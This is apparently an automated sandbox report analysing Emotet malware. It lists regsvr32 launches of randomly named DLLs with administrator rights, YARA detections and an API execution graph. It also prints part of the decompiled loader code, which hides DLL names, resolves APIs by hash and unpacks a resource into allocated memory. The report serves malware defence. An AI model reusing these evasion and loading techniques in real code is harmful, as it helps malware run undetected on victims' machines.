                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.456044054.00000000005D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:16:41:40
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.462842300.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:16:41:44
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.468918489.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.469106015.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:16:41:46
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.474514223.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:9
                                                                                                              Start time:16:41:49
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.483801415.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:16:41:54
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.490790525.0000000000951000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.490748655.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:11
                                                                                                              Start time:16:41:56
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.497540117.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.497591181.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:12
                                                                                                              Start time:16:42:00
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.504764395.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.504642074.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                              General

                                                                                                              Target ID:13
                                                                                                              Start time:16:42:03
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.510846343.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.510821568.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                              General

                                                                                                              Target ID:14
                                                                                                              Start time:16:42:06
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.522451287.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.522428757.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                              General

                                                                                                              Target ID:15
                                                                                                              Start time:16:42:12
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.714099978.0000000000501000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.713962264.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:0.8%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:17.6%
                                                                                                                Total number of Nodes:279
                                                                                                                Total number of Limit Nodes:18
                                                                                                                execution_graph 49605 10006a41 49611 10047026 49605->49611 49607 10006a4b 49608 10006a50 49607->49608 49629 100470e9 49607->49629 49610 10006a73 49612 100470d3 49611->49612 49622 10047034 49611->49622 49648 100500c8 5 API calls __decode_pointer 49612->49648 49614 100470d9 49649 10049097 67 API calls __getptd_noexit 49614->49649 49617 100470df 49617->49607 49619 10047097 RtlAllocateHeap 49619->49622 49620 10047049 49620->49622 49642 1005003e 67 API calls 2 library calls 49620->49642 49643 1004fe7e 67 API calls 7 library calls 49620->49643 49644 1004c2e3 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 49620->49644 49622->49619 49622->49620 49623 100470ca 49622->49623 49624 100470be 49622->49624 49627 100470bc 49622->49627 49645 100500c8 5 API calls __decode_pointer 49622->49645 49623->49607 49646 10049097 67 API calls __getptd_noexit 49624->49646 49647 10049097 67 API calls __getptd_noexit 49627->49647 49631 100470f5 __freefls@4 49629->49631 49630 1004716e __dosmaperr __freefls@4 49630->49610 49631->49630 49641 10047134 49631->49641 49650 1004ed25 67 API calls 2 library calls 49631->49650 49632 10047149 HeapFree 49632->49630 49635 1004715b 49632->49635 49634 1004710c ___sbh_find_block 49636 1004711f ___sbh_free_block 49634->49636 49637 10047128 49634->49637 49652 10049097 67 API calls __getptd_noexit 49635->49652 49636->49637 49651 1004713f LeaveCriticalSection _doexit 49637->49651 49640 10047160 GetLastError 49640->49630 49641->49630 49641->49632 49642->49620 49643->49620 49645->49622 49646->49627 49647->49623 49648->49614 49649->49617 49650->49634 49651->49641 49652->49640 49653 10003a82 malloc 49654 10003b1b 49653->49654 49654->49654 49655 10003d20 ??3@YAXPAX 49654->49655 49656 10006a92 49657 10006aa2 49656->49657 49658 10006a9b ExitProcess 49656->49658 49661 100014bf 49657->49661 49660 10006aad 49661->49660 49662 1000617c 49661->49662 49663 10006549 bsearch 49662->49663 49664 100062fa malloc 49662->49664 49665 10006299 49662->49665 49663->49665 49664->49665 49666 1000640e qsort 49664->49666 49665->49660 49666->49663 49668 10048e27 49669 10048e33 49668->49669 49670 10048e2e 49668->49670 49674 10048d31 49669->49674 49682 10056b81 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 49670->49682 49673 10048e44 49675 10048d3d __freefls@4 49674->49675 49676 10048dda __freefls@4 49675->49676 49679 10048d8a 49675->49679 49683 10048b58 49675->49683 49676->49673 49678 10048dba 49678->49676 49680 10048b58 __CRT_INIT@12 157 API calls 49678->49680 49679->49676 49679->49678 49681 10048b58 __CRT_INIT@12 157 API calls 49679->49681 49680->49676 49681->49678 49682->49669 49684 10048c82 49683->49684 49685 10048b6b GetProcessHeap HeapAlloc 49683->49685 49686 10048cbd 49684->49686 49687 10048c88 49684->49687 49688 10048b8f GetVersionExA 49685->49688 49694 10048b88 49685->49694 49689 10048cc2 49686->49689 49690 10048d1b 49686->49690 49687->49694 49696 10048ca7 49687->49696 49820 1004c659 49687->49820 49691 10048b9f GetProcessHeap HeapFree 49688->49691 49692 10048baa GetProcessHeap HeapFree 49688->49692 49831 10051513 7 API calls __decode_pointer 49689->49831 49690->49694 49848 10051803 79 API calls 2 library calls 49690->49848 49691->49694 49695 10048bd6 49692->49695 49694->49679 49737 1004fdaa HeapCreate 49695->49737 49696->49694 49829 100564c5 68 API calls __freefls@4 49696->49829 49697 10048cc7 49832 1005496f 49697->49832 49702 10048c0c 49702->49694 49744 10051878 GetModuleHandleA 49702->49744 49705 10048cb1 49830 10051556 6 API calls __decode_pointer 49705->49830 49709 10048c1a __RTC_Initialize 49714 10048c2d GetCommandLineA 49709->49714 49728 10048c1e 49709->49728 49777 10056847 49714->49777 49715 10048d0f 49719 100470e9 __freefls@4 67 API calls 49715->49719 49716 10048cf8 49847 10051593 67 API calls 4 library calls 49716->49847 49719->49694 49722 10048cff GetCurrentThreadId 49722->49694 49723 10048c47 49724 10048c52 49723->49724 49725 10048c4b 49723->49725 49825 1005678e 102 API calls 3 library calls 49724->49825 49824 10051556 6 API calls __decode_pointer 49725->49824 49823 1004fe04 VirtualFree HeapFree HeapFree HeapDestroy 49728->49823 49729 10048c57 49730 10048c6b 49729->49730 49826 10056511 101 API calls 6 library calls 49729->49826 49736 10048c70 49730->49736 49828 100564c5 68 API calls __freefls@4 49730->49828 49733 10048c80 49733->49725 49734 10048c60 49734->49730 49827 1004c4d7 79 API calls 4 library calls 49734->49827 49736->49694 49738 1004fdcd 49737->49738 49739 1004fdca 49737->49739 49849 1004fd4f 67 API calls 2 library calls 49738->49849 49739->49702 49741 1004fdd2 49742 1004fe00 49741->49742 49743 1004fdeb HeapDestroy 49741->49743 49742->49702 49743->49739 49745 10051893 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 49744->49745 49746 1005188a 49744->49746 49748 100518dd TlsAlloc 49745->49748 49850 10051556 6 API calls __decode_pointer 49746->49850 49751 100519f7 49748->49751 49752 1005192b TlsSetValue 49748->49752 49751->49709 49752->49751 49753 1005193c 49752->49753 49851 1004c677 5 API calls 3 library calls 49753->49851 49755 10051941 49852 10051420 TlsGetValue 49755->49852 49758 10051420 __encode_pointer 5 API calls 49759 1005195c 49758->49759 49760 10051420 __encode_pointer 5 API calls 49759->49760 49761 1005196c 49760->49761 49762 10051420 __encode_pointer 5 API calls 49761->49762 49763 1005197c 49762->49763 49861 1004eb97 67 API calls ___crtInitCritSecAndSpinCount 49763->49861 49765 10051989 49766 100519f2 49765->49766 49768 1005148c __decode_pointer 5 API calls 49765->49768 49863 10051556 6 API calls __decode_pointer 49766->49863 49769 1005199d 49768->49769 49769->49766 49770 1005496f __calloc_crt 67 API calls 49769->49770 49771 100519b6 49770->49771 49771->49766 49772 1005148c __decode_pointer 5 API calls 49771->49772 49773 100519d0 49772->49773 49773->49766 49774 100519d7 49773->49774 49862 10051593 67 API calls 4 library calls 49774->49862 49776 100519df GetCurrentThreadId 49776->49751 49778 10056882 49777->49778 49779 10056863 GetEnvironmentStringsW 49777->49779 49781 1005686b 49778->49781 49782 1005691d 49778->49782 49780 10056877 GetLastError 49779->49780 49779->49781 49780->49778 49784 1005689d GetEnvironmentStringsW 49781->49784 49787 100568ac 49781->49787 49783 10056925 GetEnvironmentStrings 49782->49783 49788 10048c3d 49782->49788 49785 10056935 49783->49785 49783->49788 49784->49787 49784->49788 49865 1005492f 67 API calls _malloc 49785->49865 49786 100568c1 WideCharToMultiByte 49790 100568e0 49786->49790 49791 10056912 FreeEnvironmentStringsW 49786->49791 49787->49786 49787->49787 49803 10056285 49788->49803 49864 1005492f 67 API calls _malloc 49790->49864 49791->49788 49794 1005694e 49796 10056955 FreeEnvironmentStringsA 49794->49796 49797 10056961 __Gettnames_l 49794->49797 49795 100568e6 49795->49791 49798 100568ef WideCharToMultiByte 49795->49798 49796->49788 49801 10056969 FreeEnvironmentStringsA 49797->49801 49799 10056900 49798->49799 49800 10056909 49798->49800 49802 100470e9 __freefls@4 67 API calls 49799->49802 49800->49791 49801->49788 49802->49800 49866 100491ec 49803->49866 49805 10056291 GetStartupInfoA 49806 1005496f __calloc_crt 67 API calls 49805->49806 49814 100562b2 49806->49814 49807 100564bc __freefls@4 49807->49723 49808 10056439 GetStdHandle 49813 10056403 49808->49813 49809 1005649e SetHandleCount 49809->49807 49810 1005496f __calloc_crt 67 API calls 49810->49814 49811 1005644b GetFileType 49811->49813 49812 10056386 49812->49813 49815 100563af GetFileType 49812->49815 49816 100563ba 49812->49816 49813->49808 49813->49809 49813->49811 49819 10056462 49813->49819 49814->49807 49814->49810 49814->49812 49814->49813 49815->49812 49815->49816 49816->49807 49816->49812 49867 10059ee6 67 API calls 5 library calls 49816->49867 49819->49807 49819->49813 49868 10059ee6 67 API calls 5 library calls 49819->49868 49869 1004c569 49820->49869 49822 1004c664 49822->49696 49823->49694 49825->49729 49826->49734 49827->49730 49828->49733 49829->49705 49831->49697 49835 10054973 49832->49835 49834 10048cd3 49834->49694 49838 1005148c TlsGetValue 49834->49838 49835->49834 49836 10054993 Sleep 49835->49836 49889 100477d2 49835->49889 49837 100549a8 49836->49837 49837->49834 49837->49835 49839 100514c0 GetModuleHandleA 49838->49839 49840 1005149f 49838->49840 49841 100514cf GetProcAddress 49839->49841 49842 10048cf1 49839->49842 49840->49839 49843 100514a9 TlsGetValue 49840->49843 49844 100514b8 49841->49844 49842->49715 49842->49716 49846 100514b4 49843->49846 49844->49842 49845 100514df RtlDecodePointer 49844->49845 49845->49842 49846->49839 49846->49844 49847->49722 49848->49694 49849->49741 49851->49755 49853 10051454 GetModuleHandleA 49852->49853 49854 10051433 49852->49854 49856 10051463 GetProcAddress 49853->49856 49857 1005147d 49853->49857 49854->49853 49855 1005143d TlsGetValue 49854->49855 49859 10051448 49855->49859 49858 1005144c 49856->49858 49857->49758 49858->49857 49860 10051473 RtlEncodePointer 49858->49860 49859->49853 49859->49858 49860->49857 49861->49765 49862->49776 49864->49795 49865->49794 49866->49805 49867->49816 49868->49819 49870 1004c575 __freefls@4 49869->49870 49885 1004ed25 67 API calls 2 library calls 49870->49885 49872 1004c57c 49874 1005148c __decode_pointer 5 API calls 49872->49874 49883 1004c5b8 _doexit 49872->49883 49876 1004c5ab 49874->49876 49875 1004c603 49877 1004c631 __freefls@4 49875->49877 49878 1004c609 49875->49878 49879 1005148c __decode_pointer 5 API calls 49876->49879 49877->49822 49887 1004ec35 LeaveCriticalSection 49878->49887 49879->49883 49881 1004c616 49888 1004c2e3 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 49881->49888 49886 1004c622 LeaveCriticalSection _doexit 49883->49886 49885->49872 49886->49875 49887->49881 49890 100477de __freefls@4 49889->49890 49891 100477f6 49890->49891 49901 10047815 _memset 49890->49901 49902 10049097 67 API calls __getptd_noexit 49891->49902 49893 100477fb 49903 10050228 5 API calls 2 library calls 49893->49903 49895 10047887 RtlAllocateHeap 49895->49901 49896 1004780b __freefls@4 49896->49835 49901->49895 49901->49896 49904 1004ed25 67 API calls 2 library calls 49901->49904 49905 1004fa6c 5 API calls 2 library calls 49901->49905 49906 100478ce LeaveCriticalSection _doexit 49901->49906 49907 100500c8 5 API calls __decode_pointer 49901->49907 49902->49893 49904->49901 49905->49901 49906->49901 49907->49901 49908 10020a61 49910 10020a6d __EH_prolog3 49908->49910 49911 10020abb 49910->49911 49919 10020650 EnterCriticalSection 49910->49919 49932 1000a069 3 API calls 3 library calls 49910->49932 49933 10020786 TlsAlloc InitializeCriticalSection 49910->49933 49934 1002047d EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 49911->49934 49915 10020ac8 49916 10020ae1 ~_Task_impl 49915->49916 49917 10020ace 49915->49917 49935 10020828 10 API calls 4 library calls 49917->49935 49924 1002066f 49919->49924 49920 1002072b _memset 49921 1002073f LeaveCriticalSection 49920->49921 49921->49910 49922 100206a8 49926 100206b0 GlobalAlloc 49922->49926 49923 100206bd GlobalHandle GlobalUnlock 49925 10001311 49923->49925 49924->49920 49924->49922 49924->49923 49927 100206da GlobalReAlloc 49925->49927 49928 100206e4 49926->49928 49927->49928 49929 1002070c GlobalLock 49928->49929 49930 100206ef GlobalHandle GlobalLock 49928->49930 49931 100206fd LeaveCriticalSection 49928->49931 49929->49920 49930->49931 49931->49929 49932->49910 49933->49910 49934->49915 49935->49916 49936 10007dd4 49937 10007df4 49936->49937 49938 100082ee 49936->49938 49941 1000830a 49937->49941 49943 10007e01 49937->49943 49952 1004763e 5 API calls __invoke_watson 49938->49952 49940 10008321 49951 10048578 86 API calls 8 library calls 49941->49951 49944 10008091 LoadResource SizeofResource 49943->49944 49945 10008165 VirtualAlloc 49944->49945 49946 100080b9 VirtualAllocExNuma 49944->49946 49947 10008219 memcpy malloc 49945->49947 49946->49947 49948 10001082 49947->49948 49949 100082cc 49948->49949 49950 100082da ??3@YAXPAX 49949->49950 49950->49938 49951->49938 49952->49940 49953 10001186 49954 10006050 VirtualAlloc 49953->49954 49955 10004ac7 49956 10004adf 49955->49956 49958 10004ad9 49955->49958 49957 10004cf4 VirtualProtect 49956->49957 49956->49958 49957->49958 49959 100011bd 49960 1000606c VirtualFree 49959->49960

                                                                                                                Executed Functions

                                                                                                                Function 10007DD4 Relevance: 44.1, APIs: 8, Strings: 17, Instructions: 375memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10007DD4(void* __ebx, void* __edi, void* __esi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				char _v52;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				signed int _v84;
				void* _v88;
				int _v92;
				struct HINSTANCE__* _v96;
				void* _v100;
				void* __ebp;
				signed int _t80;
				void* _t86;
				short _t90;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t119;
				long _t122;
				signed int _t123;
				void* _t124;
				void* _t126;
				signed int _t127;
				intOrPtr _t138;
				signed int _t140;
				void* _t157;
				intOrPtr* _t158;
				signed int _t179;
				signed int _t183;
				short _t198;
				signed int _t201;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				void* _t220;
				signed int _t223;
				void* _t240;
				struct HRSRC__* _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed int _t256;
				signed int _t258;
				signed int _t259;
				signed int _t274;
				void* _t282;

				_t239 = __esi;
				_t219 = __edi;
				_t156 = __ebx;
				_t80 =  *0x100b9e70; // 0xbb35530
				_v8 = _t80 ^ _t274;
				_v96 = _a4;
				_t84 = _a8 != 1;
				_t280 = _a8 != 1;
				if(_a8 != 1) {
					L6:
					_t86 = 1;
				} else {
					if(L10001361(_t84, __ebx, __esi, _t280) != 0) {
						_push(0x10098b28);
						E10048578(__ebx, _t208, __edi, __esi, __eflags);
						_t86 = 0;
						__eflags = 0;
					} else {
						_t90 = 0x6c;
						_t220 = 0;
						_t198 = 0x64;
						_v70 = _t90;
						_v60 = _t90;
						_v58 = _t90;
						_v22 = _t90;
						_v20 = _t90;
						_v14 = _t90;
						_v12 = _t90;
						_v36 = _t90;
						_v34 = _t90;
						 *0x100b8250 = 0;
						 *0x100b8254 = 0;
						 *0x100b8258 = 0;
						 *0x100b8260 = 0;
						 *0x100b825c = 0;
						 *0x100b8264 = 0;
						 *0x100b8268 = 0;
						_v80 = 0x6b;
						_v78 = 0x65;
						_v76 = 0x72;
						_v74 = 0x6e;
						_v72 = 0x65;
						_v68 = 0x33;
						_v66 = 0x32;
						_v64 = 0x2e;
						_v62 = _t198;
						_v56 = 0;
						_v28 = 0x6e;
						_v26 = 0x74;
						_v24 = _t198;
						_v18 = 0x2e;
						_v16 = _t198;
						_v10 = 0;
						_v52 = 0x6d;
						_v50 = 0x73;
						_v48 = 0x76;
						_v46 = 0x63;
						_v44 = 0x72;
						_v42 = 0x74;
						_v40 = 0x2e;
						_v38 = _t198;
						_v32 = 0;
						_t240 = L10001497();
						_v84 = L10001497();
						_t42 =  &_v52; // 0x6d
						_t157 = L10001497();
						_t97 = L100013ED();
						 *0x100bc0a4 = _t97;
						_t98 = L100013ED();
						 *0x100bc0a0 = _t98;
						_t99 = L100013ED();
						 *0x100bc094 = _t99;
						_t100 = L100013ED();
						 *0x100bc084 = _t100;
						 *0x100bc098 = L100013ED();
						_t102 = L100013ED();
						 *0x100bc0b0 = _t102;
						_t103 = L100013ED();
						 *0x100bc05c = _t103;
						_t104 = L100013ED();
						 *0x100bc060 = _t104;
						_t105 = L100013ED();
						 *0x100bc06c = _t105;
						_t106 = L100013ED();
						 *0x100bc088 = _t106;
						_t107 = L100013ED();
						 *0x100bc080 = _t107;
						_t108 = L100013ED();
						 *0x100bc07c = _t108;
						_t109 = L100013ED();
						 *0x100bc08c = _t109;
						_t110 = L100013ED();
						 *0x100bc0b4 = _t110;
						_t111 = L100013ED();
						 *0x100bc070 = _t111;
						_t112 = L100013ED();
						 *0x100bc068 = _t112;
						_t113 = L100013ED();
						 *0x100bc0ac = _t113;
						_t114 = L100013ED();
						 *0x100bc0a8 = _t114;
						_t115 = L100013ED();
						 *0x100bc090 = _t115;
						_t116 = L100013ED();
						 *0x100bc064 = _t116;
						_t158 = L100013ED();
						 *0x100bc09c = _t158;
						_t118 = L100013ED();
						 *0x100bc078 = _t118;
						_t119 = L100013ED();
						 *0x100bc074 = _t119;
						_t241 =  *_t158(_v96, 0x18db, 0x10098b50, _t240, 0xe498a819, _t240, 0x38fc338c, _t240, 0x13eaa9b, _t240, 0x91bc62bf, _t240, 0x14b15953, _t240, 0x8d7cfac7, _t240, 0x16723a2f, _v84, 0x13c73337, _t240, 0xb279ad6e, _t240, 0xf3f7e5b8, _t240, 0x21fc0ac3, _t240, 0x1f34d42c, _t240, 0xe8b443c4, _t240, 0x4978d8bb, _t240, 0x1e0f72a8, _t240, 0x375fda65, _t157, 0x235d8184, _t157, 0x23b57d89, _t157, 0xc55813b, _t157, 0xafc6405d, _t157, 0x9559310e, _t157, 0x22f53faf, _t157, 0x21ad3fb3, _t42,  &_v28,  &_v80, __edi, __esi, __ebx);
						_v100 = LoadResource(_v96, _t241);
						_t122 = SizeofResource(_v96, _t241);
						_t282 =  *0x100bc06c - _t220; // 0x74f44d2f
						_v92 = _t122;
						if(_t282 == 0) {
